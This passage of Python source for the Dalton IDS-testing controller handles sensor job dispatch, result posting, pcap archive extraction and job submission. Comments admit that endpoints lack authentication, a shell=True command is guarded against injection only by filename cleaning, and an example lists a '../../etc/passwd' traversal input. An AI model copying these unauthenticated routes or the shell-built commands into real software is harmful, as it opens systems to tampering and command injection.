if int(get_job_status(job)) != STAT_CODE_DONE:
set_job_status_msg(job, msg)
logger.debug("Dalton Agent %s sent update for job %s; msg: %s" % (uid, job, msg))
return "OK"
@dalton_blueprint.route('/dalton/sensor_api/request_job/<sensor_tech>/', methods=['GET'])
#@auth_required('read')
def sensor_request_job(sensor_tech):
"""Sensor API. Called when a sensor wants a new job"""
# job request from Dalton Agent
global r
global STAT_CODE_RUNNING
SENSOR_UID = 'unknown'
try:
SENSOR_UID = request.args['SENSOR_UID']
except Exception as e:
SENSOR_UID = 'unknown'
SENSOR_IP = request.remote_addr
AGENT_VERSION = 'unknown'
try:
AGENT_VERSION = request.args['AGENT_VERSION']
except Exception as e:
AGENT_VERSION = 'unknown'
# update check-in data; use md5 hash of SENSOR_UID.SENSOR_IP
# note: sensor keys are expired by function clear_old_agents() which removes the sensor
# when it has not checked in in <x> amount of time (expire time configurable via
# 'agent_purge_time' parameter in dalton.conf).
hash = hashlib.md5()
hash.update(SENSOR_UID)
hash.update(SENSOR_IP)
SENSOR_HASH = hash.hexdigest()
r.sadd("sensors", SENSOR_HASH)
r.set("%s-uid" % SENSOR_HASH, SENSOR_UID)
r.set("%s-ip" % SENSOR_HASH, SENSOR_IP)
r.set("%s-time" % SENSOR_HASH, datetime.datetime.now().strftime("%b %d %H:%M:%S"))
r.set("%s-epoch" % SENSOR_HASH, int(time.mktime(time.localtime())))
r.set("%s-tech" % SENSOR_HASH, sensor_tech)
r.set("%s-agent_version" % SENSOR_HASH, AGENT_VERSION)
# grab a job! If it doesn't exist, return sleep.
response = r.lpop(sensor_tech)
if response is None:
return "sleep"
else:
respobj = json.loads(response)
new_jobid = respobj['id']
logger.info("Dalton Agent %s grabbed job %s for %s" % (SENSOR_UID, new_jobid, sensor_tech))
# there is a key for each sensor which is ("%s-current_job" % SENSOR_HASH) and has
# the value of the current job id it is running. This value is set when a job is
# requested and set to 'None' when the results are posted. A sensor can only run
# one job at a time, so if there is an existing job when the sensor requests a new
# job, it means the sensor was interrupted while processing that job and
# did not communicate back with the controller.
existing_job = r.get("%s-current_job" % SENSOR_HASH)
#logger.debug("Dalton in sensor_request_job(): job requested, sensor hash %s, new job: %s, existing job: %s" % (SENSOR_HASH, new_jobid, existing_job))
if existing_job and existing_job != new_jobid:
set_job_status(existing_job, STAT_CODE_INTERRUPTED)
set_job_status_msg(existing_job, "Job %s was unexpectedly interrupted while running on the agent; please try submitting the job again." % existing_job)
# these shouldn't be populated but set them to expire just in case to prevent redis memory build up
set_keys_timeout(existing_job)
r.set("%s-current_job" % SENSOR_HASH, new_jobid)
EXPIRE_VALUE = REDIS_EXPIRE
if r.get("%s-teapotjob" % new_jobid):
EXPIRE_VALUE = TEAPOT_REDIS_EXPIRE
r.expire("%s-current_job" % SENSOR_HASH, EXPIRE_VALUE)
r.set("%s-start_time" % new_jobid, int(time.time()))
r.expire("%s-start_time" % new_jobid, EXPIRE_VALUE)
set_job_status(new_jobid,STAT_CODE_RUNNING)
# if a user sees the "Running" message for more than a few dozen seconds (depending on
# the size of the pcap(s) and ruleset), then the job is hung on the agent or is going to
# timeout. Most likely the agent was killed or died during the job run.
set_job_status_msg(new_jobid, "Running...")
# set expire times for keys that are stored on server until job is requested
r.expire("%s-submission_time" % new_jobid, EXPIRE_VALUE)
r.expire("%s-user" % new_jobid, EXPIRE_VALUE)
r.expire("%s-tech" % new_jobid, EXPIRE_VALUE)
return response
@dalton_blueprint.route('/dalton/sensor_api/results/<jobid>', methods=['POST'])
#@auth_required('write')
def post_job_results(jobid):
""" called by Dalton Agent sending job results """
# no authentication or authorization so this is easily abused; anyone with jobid
# can overwrite results if they submit first.
global STAT_CODE_DONE, STAT_CODE_RUNNING, STAT_CODE_QUEUED, DALTON_URL, REDIS_EXPIRE, TEAPOT_REDIS_EXPIRE, TEMP_STORAGE_PATH
global r
# check and make sure job results haven't already been posted in order to prevent
# abuse/overwriting. This still isn't foolproof.
if r.exists("%s-time" % jobid) and (int(get_job_status(jobid)) not in [STAT_CODE_RUNNING, STAT_CODE_QUEUED]):
logger.error("Data for jobid %s already exists in database; not overwriting. Source IP: %s. job_status_code code: %d" % (jobid, request.remote_addr, int(get_job_status(jobid))))
#typically this would go back to Agent who then ignores it
return Response("Error: job results already exist.", mimetype='text/plain', headers = {'X-Dalton-Webapp':'Error'})
jsons = request.form.get('json_data')
result_obj = json.loads(jsons)
set_job_status_msg(jobid, "Final Job Status: %s" % result_obj['status'])
# get sensor hash and update ("%s-current_job" % SENSOR_HASH) with 'None'
SENSOR_IP = request.remote_addr
SENSOR_UID = 'unknown'
try:
SENSOR_UID = request.args['SENSOR_UID']
except Exception as e:
SENSOR_UID = 'unknown'
hash = hashlib.md5()
hash.update(SENSOR_UID)
hash.update(SENSOR_IP)
SENSOR_HASH = hash.hexdigest()
r.set("%s-current_job" % SENSOR_HASH, None)
r.expire("%s-current_job" % SENSOR_HASH, REDIS_EXPIRE)
logger.info("Dalton agent %s submitted results for job %s. Result: %s" % (SENSOR_UID, jobid, result_obj['status']))
#save results to db
if 'ids' in result_obj:
ids = result_obj['ids']
elif 'snort' in result_obj:
ids = result_obj['snort']
else:
ids = ""
if 'performance' in result_obj:
perf = result_obj['performance']
else:
perf = ""
if 'alert' in result_obj:
alert = result_obj['alert']
else:
alert = ""
if 'error' in result_obj:
error = result_obj['error']
else:
error = ""
if 'debug' in result_obj:
debug = result_obj['debug']
else:
debug = ""
if 'total_time' in result_obj:
time = result_obj['total_time']
else:
time = ""
# alert_detailed is base64 encoded unified2 binary data
alert_detailed = ""
if 'alert_detailed' in result_obj and U2_ANALYZER:
try:
# write to disk and pass to u2spewfoo.py; we could do
# myriad other things here like modify or import that
# code but this works and should be compatible and
# incorporate any future changes/improvements to the
# script
u2_file = os.path.join(TEMP_STORAGE_PATH, "%s_unified2_%s" % (jobid, SENSOR_HASH))
u2_fh = open(u2_file, "wb")
u2_fh.write(base64.b64decode(result_obj['alert_detailed']))
u2_fh.close()
u2spewfoo_command = "%s %s" % (U2_ANALYZER, u2_file)
logger.debug("Processing unified2 data with command: '%s'" % u2spewfoo_command)
alert_detailed = subprocess.Popen(u2spewfoo_command, shell=True, stderr=subprocess.STDOUT, stdout=subprocess.PIPE).stdout.read()
# delete u2 file
os.unlink(u2_file)
except Exception as e:
logger.error("Problem parsing unified2 data from Agent. Error: %s" % e)
alert_detailed = ""
else:
alert_detailed = ""
# other_logs only supported on Suricata for now
if "other_logs" in result_obj:
other_logs = result_obj['other_logs']
else:
other_logs = ""
r.set("%s-ids" % jobid, ids)
r.set("%s-perf" % jobid, perf)
r.set("%s-alert" % jobid, alert)
r.set("%s-error" % jobid, error)
r.set("%s-debug" % jobid, debug)
r.set("%s-time" % jobid, time)
r.set("%s-alert_detailed" % jobid, alert_detailed)
r.set("%s-other_logs" % jobid, other_logs)
set_keys_timeout(jobid)
if error:
set_job_status_msg(jobid, '<div style="color:red">ERROR!</div> <a href="/dalton/job/%s">Click here for details</a>' % jobid)
else:
set_job_status_msg(jobid, '<a href="/dalton/job/%s">Click here to view your results</a>' % jobid)
set_job_status(jobid, STAT_CODE_DONE)
return Response("OK", mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
# older versions used 'sensor_api' but it really should be 'controller_api'
@dalton_blueprint.route('/dalton/sensor_api/job_status/<jobid>', methods=['GET'])
@dalton_blueprint.route('/dalton/controller_api/job_status/<jobid>', methods=['GET'])
#@login_required()
def get_ajax_job_status_msg(jobid):
"""return the job status msg (as a string)"""
# user's browser requesting job status msg
global STAT_CODE_RUNNING
if not validate_jobid(jobid):
return Response("Invalid Job ID: %s" % jobid, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
stat_code = get_job_status(jobid)
if stat_code:
if int(stat_code) == STAT_CODE_RUNNING:
check_for_timeout(jobid)
r_status_msg = get_job_status_msg(jobid)
if r_status_msg:
return Response(r_status_msg, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
else:
return Response('Unknown', mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
else:
return Response("Invalid Job ID: %s" % jobid, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
@dalton_blueprint.route('/dalton/controller_api/job_status_code/<jobid>', methods=['GET'])
#@login_required()
def get_ajax_job_status_code(jobid):
"""return the job status code (AS A STRING! -- you need to cast the return value as an int if you want to use it as an int)"""
# user's browser requesting job status code
global STAT_CODE_INVALID, STAT_CODE_RUNNING
if not validate_jobid(jobid):
return "%d" % STAT_CODE_INVALID
r_status_code = get_job_status(jobid)
if not r_status_code:
# invalid jobid
return "%d" % STAT_CODE_INVALID
else:
if int(r_status_code) == STAT_CODE_RUNNING:
check_for_timeout(jobid)
return get_job_status(jobid)
@dalton_blueprint.route('/dalton/sensor_api/get_job/<id>', methods=['GET'])
#@auth_required('read')
def sensor_get_job(id):
# user or agent requesting a job zip file
global JOB_STORAGE_PATH
# get the user (for logging)
logger.debug("Dalton in sensor_get_job(): request for job zip file %s" % (id))
if not validate_jobid(id):
logger.error("Bad jobid given: '%s'. Possible hacking attempt." % id)
return render_template('/dalton/error.html', jid=id, msg=["Bad jobid, invalid characters in: '%s'" % (id)])
path = "%s/%s.zip" % (JOB_STORAGE_PATH, id)
if os.path.exists(path):
filedata = open(path, 'rb').read()
logger.debug("Dalton in sensor_get_job(): sending job zip file %s" % (id))
return Response(filedata,mimetype="application/zip", headers={"Content-Disposition":"attachment;filename=%s.zip" % id})
else:
logger.error("Dalton in sensor_get_job(): could not find job %s at %s." % (id, path))
return render_template('/dalton/error.html', jid=id, msg=["Job %s does not exist on disk. It is either invalid or has been deleted." % id])
def clear_old_agents():
global r, AGENT_PURGE_TIME
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
minutes_ago = int(round((int(time.mktime(time.localtime())) - int(r.get("%s-epoch" % sensor))) / 60))
if minutes_ago >= AGENT_PURGE_TIME:
# delete old agents
r.delete("%s-uid" % sensor)
r.delete("%s-ip" % sensor)
r.delete("%s-time" % sensor)
r.delete("%s-epoch" % sensor)
r.delete("%s-tech" % sensor)
r.delete("%s-agent_version" % sensor)
r.srem("sensors", sensor)
@dalton_blueprint.route('/dalton/sensor', methods=['GET'])
#@login_required()
def page_sensor_default(return_dict = False):
"""the default sensor page"""
global r
sensors = {}
# first clear out old agents ('sensors')
clear_old_agents()
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
minutes_ago = int(round((int(time.mktime(time.localtime())) - int(r.get("%s-epoch" % sensor))) / 60))
sensors[sensor] = {}
sensors[sensor]['uid'] = "%s" % r.get("%s-uid" % sensor)
sensors[sensor]['ip'] = "%s" % r.get("%s-ip" % sensor)
sensors[sensor]['time'] = "%s (%d minutes ago)" % (r.get("%s-time" % sensor), minutes_ago)
sensors[sensor]['tech'] = "%s" % r.get("%s-tech" % sensor)
sensors[sensor]['agent_version'] = "%s" % r.get("%s-agent_version" % sensor)
if return_dict:
return sensors
else:
return render_template('/dalton/sensor.html', page='', sensors=sensors)
# validates passed in filename (should be from Flowsynth) to verify
# that it exists and isn't trying to do something nefarious like
# directory traversal
def verify_fs_pcap(fspcap):
global FS_PCAP_PATH
# require fspcap to be POSIX fully portable filename
if not re.match(r"^[A-Za-z0-9\x5F\x2D\x2E]+$", fspcap):
logger.error("Bad fspcap filename provided: '%s'. Filename must be POSIX fully portable." % fspcap)
return "Bad pcap filename provided: '%s'" % (fspcap)
fspcap_path = os.path.join(FS_PCAP_PATH, os.path.basename(fspcap))
logger.debug("Flowsynth pcap file passed: %s" % fspcap_path)
if not os.path.isfile(fspcap_path):
logger.error("fspcap file '%s' not found." % fspcap_path)
return "File not found: '%s'" % os.path.basename(fspcap)
return None
"""validate that job_id has expected characters; prevent directory traversal"""
def validate_jobid(jid):
if not re.match (r'^(teapot_)?[a-zA-Z\d]+$', jid):
return False
else:
return True
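# Illustrative examples (not part of the original file) of what the job ID
# check accepts and rejects:
#
#   validate_jobid("a1b2c3d4e5f60718")        # -> True
#   validate_jobid("teapot_a1b2c3d4e5f607")   # -> True
#   validate_jobid("../../etc/passwd")        # -> False (path traversal attempt)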
@dalton_blueprint.route('/dalton/coverage/<sensor_tech>/', methods=['GET'])
#@login_required()
def page_coverage_default(sensor_tech, error=None):
"""the default coverage wizard page"""
global CONF_STORAGE_PATH, MAX_PCAP_FILES
global r
ruleset_dirs = []
if sensor_tech is None:
return render_template('/dalton/error.html', jid='', msg=["No Sensor technology selected for job."])
sensor_tech = sensor_tech.split('-')[0]
conf_dir = "%s/%s" % (CONF_STORAGE_PATH, sensor_tech)
if not re.match(r"^[a-zA-Z0-9\_\-\.]+$", sensor_tech):
return render_template('/dalton/error.html', jid='', msg=["Invalid Sensor technology requested: %s" % sensor_tech])
elif sensor_tech == 'summary':
return render_template('/dalton/error.html', jid='', msg=["Page expired. Please resubmit your job or access it from the queue."])
if not os.path.isdir(conf_dir):
return render_template('/dalton/error.html', jid='', msg=["No engine configuration directory for '%s' found (%s)." % (sensor_tech, conf_dir)])
# pcap filename passed in from Flowsynth
fspcap = None
try:
fspcap = request.args['fspcap']
err_msg = verify_fs_pcap(fspcap)
if err_msg != None:
return render_template('/dalton/error.html', jid='', msg=["%s" % (err_msg)])
except:
fspcap = None
# get list of rulesets based on engine
rulesets = get_rulesets(sensor_tech.split('-')[0])
# enumerate sensor versions based on available sensors and pass them to coverage.html
# This way we can dynamically update the submission page as soon as new sensor versions check in
clear_old_agents()
sensors = []
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
try:
tech = r.get("%s-tech" % sensor)
if tech.startswith(sensor_tech):
if tech not in sensors:
sensors.append(tech)
except Exception as e:
return render_template('/dalton/error.html', jid=None, msg=["Error getting sensor list for %s. Error:\n%s" % (tech, e)])
try:
# sort by version number
sensors.sort(key=LooseVersion, reverse=True)
except Exception as e:
sensors.sort(reverse=True)
# get conf or yaml file if sensor supports it
engine_conf = None
# return the engine.conf from the first sensor in the list which is sorted (see above)
# and should be the most recent sensor version (depends on lexical sort done above). It
# is also the sensor version that is checked by default on the job submission page.
# this also handles populating ip/port variables
if len(sensors) > 0:
try:
configs = json.loads(get_engine_conf_file(sensors[0]))
#logger.debug("CONfigs:\n%s" % configs)
engine_conf = configs['conf']
variables = configs['variables']
except Exception as e:
logger.error("Could not process JSON from get_engine_conf_file: %s" % e)
engine_conf = "# not found"
variables = "# not found"
else:
# no sensors available. Job won't run but we can provide a default engine.conf anyway
engine_conf = "# not found"
variables = "# not found"
return render_template('/dalton/coverage.html', sensor_tech=sensor_tech, rulesets=rulesets, error=error, variables=variables, engine_conf=engine_conf, sensors=sensors, fspcap=fspcap, max_pcaps=MAX_PCAP_FILES)
@dalton_blueprint.route('/dalton/job/<jid>')
#@auth_required()
def page_show_job(jid):
global r
tech = r.get("%s-tech" % jid)
status = get_job_status(jid)
if not status:
# job doesn't exist
# expire (delete) all keys related to the job just in case to prevent memory leaks
expire_all_keys(jid)
return render_template('/dalton/error.html', jid=jid, msg=["Invalid Job ID. Job may have expired.", "By default, jobs are only kept for %d seconds; teapot jobs are kept for %s seconds." % (REDIS_EXPIRE, TEAPOT_REDIS_EXPIRE)])
elif int(status) != STAT_CODE_DONE:
# job is queued or running
return render_template('/dalton/coverage-summary.html', page='', job_id=jid, tech=tech)
else:
# job exists and is done
ids = r.get("%s-ids" % jid)
perf = r.get("%s-perf" % jid)
alert = r.get("%s-alert" % jid)
error = r.get("%s-error" % jid)
total_time = r.get("%s-time" % jid)
alert_detailed = r.get("%s-alert_detailed" % jid)
try:
# this gets passed as json with log description as key and log contents as value
# attempt to load it as json before we pass it to job.html
other_logs = json.loads(r.get("%s-other_logs" % jid))
except Exception as e:
# if <jid>-other_logs is empty then a "No JSON object could be decoded" error will be thrown, so just handle it cleanly
other_logs = ""
#logger.error("could not load json other_logs:\n%s\n\nvalue:\n%s" % (e,r.get("%s-other_logs" % jid)))
# parse out custom rules option and pass it?
custom_rules = False
try:
debug = r.get("%s-debug" % jid)
except Exception as e:
debug = ''
overview = {}
if alert is not None:
overview['alert_count'] = alert.count('[**]') / 2
else:
overview['alert_count'] = 0
if (error == ""):
overview['status'] = 'Success'
else:
overview['status'] = 'Error'
return render_template('/dalton/job.html', overview=overview, page='', jobid=jid, ids=ids, perf=perf, alert=alert, error=error, debug=debug, total_time=total_time, tech=tech, custom_rules=custom_rules, alert_detailed=alert_detailed, other_logs=other_logs)
# sanitize passed in filename (string) and make it POSIX (fully portable)
def clean_filename(filename):
return re.sub(r"[^a-zA-Z0-9\_\-\.]", "_", filename)
# handle duplicate filenames (e.g. same pcap submitted more than once)
# by renaming pcaps with same name
def handle_dup_names(filename, pcap_files, job_id, dupcount):
for pcap in pcap_files:
if pcap['filename'] == filename:
filename = "%s_%s_%d.pcap" % (os.path.splitext(filename)[0], job_id, dupcount[0])
dupcount[0] += 1
break
return filename
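# Illustrative sketch (not part of the original file): if "traffic.pcap" is already
# in pcap_files for job "0123456789abcdef", a resubmitted "traffic.pcap" would be
# renamed to "traffic_0123456789abcdef_0.pcap" and dupcount[0] incremented.
#
#   dupcount = [0]
#   name = handle_dup_names("traffic.pcap", pcap_files, job_id, dupcount)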
# extracts files from an archive and add them to the list to be
# included with the Dalton job
def extract_pcaps(archivename, pcap_files, job_id, dupcount):
global TEMP_STORAGE_PATH
# Note: archivename already sanitized
logger.debug("Attempting to extract pcaps from file '%s'" % os.path.basename(archivename))
if archivename.lower().endswith('.zip'):
# The Python zipfile module does extraction in pure Python rather than C and is
# very slow for zip files that aren't small. So to speed things up, shell out to
# 7z on the system, which is quite fast but not the first choice. Still use the
# zipfile module to inspect the archive and get filenames.
try:
if not zipfile.is_zipfile(archivename):
msg = "File '%s' is not recognized as a valid zip file." % os.path.basename(archivename)
logger.error(msg)
return msg
files_to_extract = []
zf = zipfile.ZipFile(archivename, mode='r')
for file in zf.namelist():
logger.debug("Processing file '%s' from ZIP archive" % file)
if file.endswith('/'):
continue
filename = clean_filename(os.path.basename(file))
if os.path.splitext(filename)[1].lower() not in ['.pcap', '.pcapng', '.cap']:
logger.warn("Not adding file '%s' from archive '%s': '.pcap', '.cap', or '.pcapng' extension required." % (file, os.path.basename(archivename)))
# just skip the file, and move on (and log it)
continue
files_to_extract.append(file)
zf.close()
if len(files_to_extract) > 0:
# make temporary location for extracting with 7z
tempd = tempfile.mkdtemp()
logger.debug("temp directory for 7z: %s" % tempd)
# try password 'infected' if password on archive
p7z_command = ['7z', 'x', archivename, '-pinfected', '-y', "-o%s" % tempd] + files_to_extract
# does 7z handle invalid filenames or should more sanitization be attempted?
logger.debug("7z command: %s" % p7z_command)
# I'm not convinced that 7z outputs to stderr
p7z_out = subprocess.Popen(p7z_command, shell=False, stderr=subprocess.STDOUT, stdout=subprocess.PIPE).stdout.read()
if "Everything is Ok" not in p7z_out and "Errors: " in p7z_out:
logger.error("Problem extracting ZIP archive '%s': %s" % (os.path.basename(archivename), p7z_out))
raise Exception("p7zip error. See logs for details")
logger.debug("7z out: %s" % p7z_out)
# move files; handle duplicate filenames
for file in files_to_extract:
filename = clean_filename(os.path.basename(file))
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
pcapsrc = os.path.join(tempd, file)
# move the extracted file into the job's temp directory
shutil.move(pcapsrc, pcappath)
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Successfully extracted and added pcap file '%s'" % os.path.basename(filename))
# cleanup
shutil.rmtree(tempd)
except Exception as e:
msg = "Problem extracting ZIP file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
elif os.path.splitext(archivename)[1].lower() in ['.gz', '.gzip'] and \
os.path.splitext(os.path.splitext(archivename)[0])[1].lower() not in ['.tar']:
# gzipped file
try:
filename = os.path.basename(os.path.splitext(archivename)[0])
logger.debug("Decompressing gzipped file '%s'" % filename)
with gzip.open(archivename, 'rb') as gz:
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
fh = open(pcappath, 'wb')
fh.write(gz.read())
fh.close()
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Added %s" % filename)
except Exception as e:
msg = "Problem extracting gzip file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
elif os.path.splitext(archivename)[1].lower() in ['.bz2'] and \
os.path.splitext(os.path.splitext(archivename)[0])[1].lower() not in ['.tar']:
# bzip2 file
try:
filename = os.path.basename(os.path.splitext(archivename)[0])
logger.debug("Decompressing bzip2 file '%s'" % filename)
with bz2.BZ2File(archivename, 'rb') as bz:
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
fh = open(pcappath, 'wb')
fh.write(bz.read())
fh.close()
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Added %s" % filename)
except Exception as e:
msg = "Problem extracting bzip2 file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
else:
try:
archive = tarfile.open(archivename, mode="r:*")
for file in archive.getmembers():
logger.debug("Processing file '%s' from archive" % file.name)
if not file.isfile():
logger.warn("Not adding member '%s' from archive '%s': not a file." % (file.name, os.path.basename(archivename)))
continue
filename = clean_filename(os.path.basename(file.name))
if os.path.splitext(filename)[1].lower() not in ['.pcap', '.pcapng', '.cap']:
logger.warn("Not adding file '%s' from archive '%s': '.pcap', '.cap', or '.pcapng' extension required." % (file.name, os.path.basename(archivename)))
# just skip the file, and move on (and log it)
continue
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
fh = open(pcappath, 'wb')
contentsfh = archive.extractfile(file)
fh.write(contentsfh.read())
fh.close()
pcap_files.append({'filename': filename, 'pcappath': pcappath})
logger.debug("Added %s" % filename)
archive.close()
except Exception as e:
msg = "Problem extracting archive file '%s': %s" % (os.path.basename(archivename), e)
logger.error(msg)
logger.debug("%s" % traceback.format_exc())
return msg
return None
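# Illustrative call pattern for extract_pcaps() (a sketch based on how it is used
# below in page_coverage_summary(); the archive path shown is a placeholder):
#
#   pcap_files = []   # list of {'filename': ..., 'pcappath': ...} dicts, filled in place
#   dupcount = [0]    # list so the duplicate counter can be updated by reference
#   err_msg = extract_pcaps('/path/to/upload.zip', pcap_files, job_id, dupcount)
#   if err_msg:
#       # extraction failed; err_msg is a user-displayable error string
#       ...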
# abstracting the job submission method away from the HTTP POST and creating this
# function so that it can be called easier (e.g. from an API)
def submit_job():
logger.debug("submit_job() called")
# never finished coding this...
# TODO: API call that accepts a job zipfile and queues it up for an agent?
# would have to beef up input validation on agent probably....
@dalton_blueprint.route('/dalton/coverage/summary', methods=['POST'])
#@auth_required()
# ^^ can change and add resource and group permissions if we want to restrict who can submit jobs
def page_coverage_summary():
""" the summary page once the coverage wizard has been submitted"""
# user submitting a job to Dalton via the web interface
global JOB_STORAGE_PATH
global TEMP_STORAGE_PATH
global RULESET_STORAGE_PATH
global r
global STAT_CODE_QUEUED
global FS_PCAP_PATH
global MAX_PCAP_FILES
verify_temp_storage_path()
digest = hashlib.md5()
prod_ruleset_name = None
# get the user who submitted the job .. not implemented
user = "undefined"
# generate a temporary job_id based on the current timestamp and a random number
digest.update(str(datetime.datetime.now()))
digest.update(str(random.randrange(96313375)))
job_id = digest.hexdigest()[0:16] #this is a temporary job id for the filename
#store the pcaps offline temporarily
# make temp job directory so there isn't a race condition if more
# than one person submits a pcap with the same filename at the same time
if os.path.exists(os.path.join(TEMP_STORAGE_PATH, job_id)):
shutil.rmtree(os.path.join(TEMP_STORAGE_PATH, job_id))
os.makedirs(os.path.join(TEMP_STORAGE_PATH, job_id))
# list of dicts that have filename: and pcappath: entries for pcap files on disk to include in job
pcap_files = []
form_pcap_files = []
# pcapfilename from Flowsynth; on local (Dalton controller) disk
if request.form.get("fspcap"):
fspcap = request.form.get("fspcap")
err_msg = verify_fs_pcap(fspcap)
if err_msg:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=[err_msg])
pcap_files.append({'filename': fspcap, 'pcappath': os.path.join(FS_PCAP_PATH, os.path.basename(fspcap))})
# grab the user submitted files from the web form (max number of arbitrary files allowed on the web form
# governed by max_pcap_files variable in dalton.conf)
# note that these are file storage objects; the filename must be accessed via .filename
# dupcount is a list so it can be passed (and updated) by reference
dupcount = [0]
for i in range(MAX_PCAP_FILES):
try:
pcap_file = request.files['coverage-pcap%d' % i]
if (pcap_file != None and pcap_file.filename != None and pcap_file.filename != '<fdopen>' and (len(pcap_file.filename) > 0) ):
if os.path.splitext(pcap_file.filename)[1].lower() in ['.zip', '.tar', '.gz', '.tgz', '.gzip', '.bz2']:
filename = clean_filename(os.path.basename(pcap_file.filename))
filename = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
pcap_file.save(filename)
err_msg = extract_pcaps(filename, pcap_files, job_id, dupcount)
if err_msg:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=[err_msg])
else:
form_pcap_files.append(pcap_file)
except:
logger.debug("%s" % traceback.format_exc())
pass
if len(form_pcap_files) == 0 and len(pcap_files) == 0:
#throw an error, no pcaps submitted
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["You must specify a PCAP file."])
elif (request.form.get('optionProdRuleset') == None and request.form.get('optionCustomRuleset') == None):
#throw an error, no rules defined
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["You must specify at least one ruleset."])
else:
#get the sensor technology and queue name
sensor_tech = request.form.get('sensor_tech')
#verify that we have a sensor that can handle the submitted sensor_tech
valid_sensor_tech = False
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
if r.get("%s-tech" % sensor) == sensor_tech:
valid_sensor_tech = True
break
if not valid_sensor_tech:
logger.error("Dalton in page_coverage_summary(): Error: user %s submitted a job for invalid sensor tech, \'%s\'" % (user, sensor_tech))
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["There are no sensors that support sensor technology \'%s\'." % sensor_tech])
# process files from web form
for pcap_file in form_pcap_files:
filename = os.path.basename(pcap_file.filename)
# do some input validation on the filename and try to do some accommodation to preserve original pcap filename
filename = clean_filename(filename)
if os.path.splitext(filename)[1] != '.pcap':
filename = "%s.pcap" % filename
# handle duplicate filenames (e.g. same pcap submitted more than once)
filename = handle_dup_names(filename, pcap_files, job_id, dupcount)
pcappath = os.path.join(TEMP_STORAGE_PATH, job_id, filename)
pcap_files.append({'filename': filename, 'pcappath': pcappath})
pcap_file.save(pcappath)
# If multiple files submitted to Suricata, merge them here since
# Suricata can only read one file.
if len(pcap_files) > 1 and sensor_tech.startswith("suri"):
if not MERGECAP_BINARY:
logger.error("No mergecap binary; unable to merge pcaps for Suricata job.")
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=job_id, msg=["No mergecap binary found on Dalton Controller.", "Unable to process multiple pcaps for this Suricata job."])
combined_file = "%s/combined-%s.pcap" % (os.path.join(TEMP_STORAGE_PATH, job_id), job_id)
mergecap_command = "%s -w %s -F pcap %s" % (MERGECAP_BINARY, combined_file, ' '.join([p['pcappath'] for p in pcap_files]))
logger.debug("Multiple pcap files sumitted to Suricata, combining the following into one file: %s" % ', '.join([p['filename'] for p in pcap_files]))
try:
# validation on pcap filenames done above; otherwise OS command injection here
mergecap_output = subprocess.Popen(mergecap_command, shell=True, stderr=subprocess.STDOUT, stdout=subprocess.PIPE).stdout.read()
if len(mergecap_output) > 0:
# return error?
logger.error("Error merging pcaps with command:\n%s\n\nOutput:\n%s" % (mergecap_command, mergecap_output))
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid="<not_defined>", msg=["Error merging pcaps with command:", "%s" % mergecap_command, "Output:", "%s" % (mergecap_command, mergecap_output)])
pcap_files = [{'filename': os.path.basename(combined_file), 'pcappath': combined_file}]
except Exception as e:
logger.error("Could not merge pcaps. Error: %s" % e)
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Could not merge pcaps. Error:", " %s" % e])
# get enable all rules option
bEnableAllRules = False
if request.form.get('optionProdRuleset') and request.form.get('optionEnableAllRules'):
bEnableAllRules = True
# get showFlowbitAlerts option
bShowFlowbitAlerts = False
if request.form.get('optionProdRuleset') and request.form.get('optionShowFlowbitAlerts'):
bShowFlowbitAlerts = True
# get track performance option
bTrackPerformance = False
if request.form.get('optionPerf'):
bTrackPerformance = True
# get return engine statistics option
bGetEngineStats = False
try:
if request.form.get('optionStats'):
bGetEngineStats = True
except:
pass
# get generate fast pattern option
bGetFastPattern = False
try:
if request.form.get('optionFastPattern'):
bGetFastPattern = True
except:
pass
# A 'teapot' job is one that shouldn't be stored for a long period of time; it can be used by
# functionality that programmatically analyzes a rule and/or other situations
# where the submission data shouldn't be stored for long periods of time (e.g. over an hour).
# 'teapot' is not an acronym. It's for job runs that are short and stout.
bteapotJob = False
# if teapotJob is set, set 'bteapotJob' to 'True'
try:
if request.form.get('teapotJob'):
bteapotJob = True
except:
pass
# used to tell the agent to return pcap data from alerts.
# This is only supported (for now) for agents that generate/process unified2 alerts
# and return pcap details from them.
bGetAlertDetailed = False
try:
if request.form.get('optionAlertDetailed'):
bGetAlertDetailed = True
except:
pass
# get other logs (only supported in Suricata for now)
bGetOtherLogs = False
try:
if request.form.get('optionOtherLogs'):
bGetOtherLogs = True
except:
pass
#get custom rules (if defined)
bCustomRules = False
custom_rules_file = os.path.join(TEMP_STORAGE_PATH, "%s_custom.rules" % job_id)
if request.form.get('optionCustomRuleset') and request.form.get('custom_ruleset'):
bCustomRules = True
